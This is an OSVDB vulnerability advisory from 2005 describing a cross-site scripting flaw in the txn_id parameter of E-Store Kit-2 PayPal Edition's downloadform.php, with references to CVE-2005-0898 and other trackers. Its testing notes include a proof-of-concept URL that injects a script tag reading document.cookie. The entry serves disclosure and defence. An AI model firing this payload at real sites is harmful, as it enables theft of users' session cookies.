E-Store Kit-2 PayPal Edition downloadform.php txn_id Variable XSS

2005-03-25T06:31:13
ID OSVDB:15086
Type osvdb
Reporter OSVDB
Modified 2005-03-25T06:31:13

Description

Manual Testing Notes

http://[victim]/demo/ms-pe02/downloadform.php?txn_id="><script>alert(document.cookie)</script>

References:

Vendor URL: http://www.magicscripts.com/ Security Tracker: 1013568 Secunia Advisory ID:14723 Related OSVDB ID: 15085 CVE-2005-0898